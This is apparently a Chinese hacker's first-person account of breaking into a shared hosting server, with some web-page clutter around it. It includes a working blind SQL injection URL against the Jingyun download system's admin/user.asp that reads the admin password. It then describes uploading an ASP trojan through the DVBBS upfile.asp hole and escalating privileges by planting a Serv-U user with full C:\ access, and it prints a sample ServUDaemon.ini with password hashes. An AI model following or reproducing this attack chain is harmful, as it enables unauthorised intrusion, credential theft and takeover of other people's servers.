|
|
前几天听一树说了惊云下载系统的漏洞
问题文件出在admin/user.asp
提交
http://www.xxx.com/down/admin/user.asp?user=admin' and asc(mid(pwd,1,1))>37 and '1'='1
就相当于:
select * from UserInfo where user='admin' and asc(mid(pwd,1,1))>37 and '1'='1'"
详情请见
http://play8.w1.dnscq.net/forum/index.php?showtopic=352
利用access注入得到管理员密码
上面有一个文件upfile.htm
手工利用了下动网的upfile.asp漏洞
就成功上传了个asp木马
然后那个虚拟主机的c,d盘是NTFS分区
不能访问E盘装着servu,php,webmail,
F盘是虚拟站点
servu安装目录可写~
本来打算替换他servu文件的~但是觉的太麻烦
还容易让管理员怀疑
想起servu的本地提升来了
在自己计算机上装了个servu
添加了一个用户,设置为系统管理员,目录C:\,具有可执行权限
然后去servu安装目录里看ServUDaemon.ini
格式是这样的
[GLOBAL]
Version=5.0.0.11
LocalSetupPassword=072C63105200180D5C07170A7E3E
LocalSetupPortNo=60628
ProcessID=972
[DOMAINS]
Domain1=192.168.0.102 21 向导产生域 1 0 0
Domain2=192.168.0.102 2121 123 2 0 0
[Domain1]
User1=www 1 0
[USER=www 1]
Password=ih0C292E1AC82920B7F384007F302A1296
HomeDir=D:\xiaoben
TimeOut=600
Note1="Wizard generated account"
Access1=D:\xiaoben RLPWAMCD
SKEYValues=
[Domain2]
User1=rover 1 0
User2=123 1 0
[USER=rover 2]
Password=dx5D12C060F16C7166779414FA038E881D
HomeDir=c:\
TimeOut=600
Maintenance=System
Access1=C:\ RWAMELCDP
SKEYValues=
[USER=123 2]
Password=kv3F6EED70340AD1478ADF95963A07FD00
HomeDir=c:\
TimeOut=600
Access1=C:\ RWAMLCDP
SKEYValues=
----------------
热门推荐:苹果专题、时尚专题
|
|
|
|
相关文章
|
| 杀毒软件免费随便用
瑞星全功能安全软件2009 基于“云安全”策略和“智能主动防御”技术开发.
www.rising.com.cn
|
|
|
|
